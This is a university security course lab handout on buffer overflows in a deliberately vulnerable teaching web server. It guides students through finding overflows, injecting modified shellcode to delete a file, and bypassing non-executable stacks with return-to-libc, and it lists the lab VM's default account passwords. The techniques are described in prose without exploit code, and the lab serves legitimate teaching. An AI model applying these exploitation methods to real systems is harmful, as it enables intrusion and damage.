6.893 Fall 2009 Lab 1: Buffer overflows

Handed out:	Monday, September 14, 2009
Part 1 due:	Friday, September 18, 2009 (11:59pm)
All parts due:	Friday, September 25, 2009 (11:59pm)

Introduction

This lab will introduce you to buffer overflow vulnerabilities, in the context of a simple web server written for this lab assignment. You will find buffer overflows in the web server code, write exploits for the buffer overflows to inject code into the server, figure out how to bypass non-executable stack protection, and finally look for other potential problems in the web server implementation.

Exploiting buffer overflows requires precise control over the execution environment. A small change in the compiler, environment variables, or the way the program is executed can result in slightly different memory layout and code structure, thus requiring a different exploit. For this reason, this lab uses a VMware virtual machine to run the vulnerable web server code.

To start working on this lab assignment, you should download the VMware Player, which can run virtual machines on Linux and Windows systems. For Mac users, MIT has a site license for VMware Fusion. You can download VMware Fusion from this web site.

Once you have VMware installed on your machine, you should download the course VM image, and unpack it on your computer. This virtual machine contains an installation of Ubuntu 9.04 Linux, along with the source code for lab 1. The following accounts have been created inside the VM:

Username	Password
root	6893
user	6893
httpd	6893

You can use the root account to install new software packages into the virtual machine, if you find something missing, using apt-get install pkgname. The user account can be used if you want to log in as a non-root user; it is purely for your convenience. Finally, the httpd account is used to execute the web server, and contains the source code you will need for this lab assignment, in /home/httpd/lab1. You can either log into the virtual machine using its console, or you can use ssh to log into the virtual machine over the (virtual) network. To determine the virtual machine's IP address, log in as root on the console and run /sbin/ifconfig eth0.

To help you keep track of any changes you make to the initial source code, we have initialized a git repository in /home/httpd/lab1, which you can use to manage your source code modifications. Here's a overview of Git and the Git user's manual, which you may find useful. Alternatively, you can download a clean copy of the lab source code.

Before you proceed with this lab assignment, make sure you can compile the web server:

There are two versions of the web server you will be using: httpd-exstack and httpd-nxstack. The first one has an executable stack, which makes it easier to inject executable code given a stack buffer overflow vulnerability. The second one has a non-executable stack, and you will write an exploit that bypasses non-executable stacks later in this lab assignment.

In order to run the web server in a predictable fashion---so that its stack and memory layout is the same every time---you will use the clean-env.sh script. This is the same way in which we will run the web server during grading, so make sure all of your exploits work on this configuration! Now, make sure you can run the web server and access it from a browser running on your machine, as follows:

The /sbin/ifconfig command will give you the virtual machine's IP address. In this particular example, you would want to open your browser and go to the URL http://172.16.148.129:8080/. If something doesn't seem to be working, try to figure out what went wrong, or contact the course staff, before proceeding further.

Part 1: Finding buffer overflows

In the first part of this lab assignment, you will find buffer overflows in the provided web server (/home/httpd/lab1/httpd.c). Read Aleph One's article, Smashing the Stack for Fun and Profit, as well as the paper from lecture, to figure out how buffer overflows work.

Exercise 1. Study the web server's code, in httpd.c, and find as many instances of code vulnerable to memory corruption through a buffer overflow as you can. Write down a description of each vulnerability in the file /home/httpd/lab1/answers.txt. For each vulnerability, describe the buffer which may overflow, and how you would structure the input to the web server (i.e., the HTTP request) to overflow the buffer.

Now, you will start developing exploits to take advantage of the buffer overflows you have found above. We have provided template Python code for an exploit in /home/httpd/lab1/exploit-template.py, which issues an HTTP request. The exploit template takes two arguments, the server name and port number, so you might run it as follows to issue a request to httpd running on localhost:

You are free to use this template, or write your own exploit code from scratch. Note, however, that if you choose to write your own exploit, the exploit must run correctly inside the provided virtual machine.

If you want to use gdb to help you in building your exploits, you will need to ensure that gdb runs the web server in precisely the same way as clean-env.sh does. To do this, you need to run the command unset env in gdb. You can place this command in a .gdbinit file, which gets executed every time gdb starts. We have provided such a file in /home/httpd/lab1/.gdbinit, which will take effect if you start gdb in that directory.

Exercise 2. Write an exploit that triggers each of the buffer overflows you have identified in the previous exercise. You do not need to inject code or do anything other than corrupt memory past the end of the buffer, at this point. Verify that your exploit actually corrupts memory, by either using gdb, or observing that the web server crashes.

Provide the code for each of these exploits in a separate file, and indicate in answers.txt which exploit file triggers which buffer overflow. If you believe some of the vulnerabilities you have identified in exercise 1 cannot be exploited, explain why not.

Submit your answers to this part of the lab assignment by running make handin, and upload the resulting lab1-handin.tar.gz file at http://pdos.csail.mit.edu/cgi-bin/893handin.

Part 2: Code injection

In this part, you will use your buffer overflow exploits to inject code into the web server. Use the httpd-exstack binary, since it has an executable stack that makes it easier to inject code. The goal of the injected code will be to unlink (remove) a sensitive file on the server, namely /home/httpd/grades.txt.

We have provided Aleph One's shell code for you to use in /home/httpd/lab1/shellcode.S, along with Makefile rules that produce /home/httpd/lab1/shellcode.bin, a compiled version of the shell code, when you run make. Aleph One's exploit is intended to exploit setuid-root binaries, and thus it runs a shell. You will need to modify this shell code to instead unlink /home/httpd/grades.txt.

Exercise 3. Modify your exploits for each buffer overflow in exercise 2 to hijack control flow of the web server and unlink /home/httpd/grades.txt.

If you believe that some of the buffer overflow vulnerabilities cannot be exploited in this manner, explain why not in answers.txt.

Verify that your exploits work; you will need to re-create /home/httpd/grades.txt after each successful exploit run.

Suggestion: first focus on obtaining control of the program counter. Sketch out the stack layout that you expect the program to have at the point when you overflow the buffer, and use gdb to verify that your overflow data ends up where you expect it to. Step through the execution of the function to the return instruction to make sure you can control what address the program returns to. The next, stepi, info reg, and disassemble commands in gdb should prove helpful.

Once you can reliably hijack the control flow of the program, find a suitable address that will contain the code you want to execute, and focus on placing the correct code at that address---e.g. a derivative of Aleph One's shell code.

Part 3: Return-to-libc attacks

Many modern operating systems mark the stack non-executable in an attempt to make it more difficult to exploit buffer overflows. In this part, you will explore how this protection mechanism can be circumvented. Run the httpd-nxstack server binary, which has a non-executable stack, for this part of the lab.

The key observation to exploiting buffer overflows with a non-executable stack is that you still control the program counter, after a RET instruction jumps to an address that you placed on the stack. Even though you cannot jump to the address of the overflowed buffer (it will not be executable), there's usually enough code in the vulnerable server's address space to perform the operation you want.

Thus, to bypass a non-executable stack, you need to first find the code you want to execute. This is often a function in the standard library, called libc, such as execl, system, or unlink. Then, you need to arrange for the stack to look like a call to that function with the desired arguments, such as system("/bin/sh"). Finally, you need to arrange for the RET instruction to jump to the function you found in the first step. This attack is often called a return-to-libc attack. This article contains a more detailed description of this style of attack.

Exercise 4. Make a copy of your exploit code for each of the vulnerabilities you found in exercise 3, and modify it to achieve the same goal (i.e., unlink /home/httpd/grades.txt) when run on the httpd-nxstack binary. In answers.txt, point out which exploit file corresponds to which vulnerability, or if you believe a vulnerability cannot be exploited with a non-executable stack, explain why not.

Part 4: Fixing buffer overflows and other bugs

Now that you have figured out how to exploit buffer overflows, you will try to find other kinds of vulnerabilities in the same code. As with many real-world applications, the "security" of our web server is not well-defined. Thus, you will need to use your imagination to think of a plausible threat model and policy for the web server.

Exercise 5. Look through the httpd.c code and try to find more vulnerabilities that can allow an attacker to compromise the security of the web server. Describe the attacks you have found in answers.txt, along with an explanation of the limitations of the attack, what an attacker can accomplish, why it works, and how you might go about fixing or preventing it.

One approach for finding vulnerabilities is to trace the flow of inputs controlled by the attacker through the server code. At each point that the attacker's input is used, consider all the possible values the attacker might have provided at that point, and what the attacker can achieve in that manner.

Finally, we will quickly look at fixing all of the vulnerabilities you have found in this lab assignment.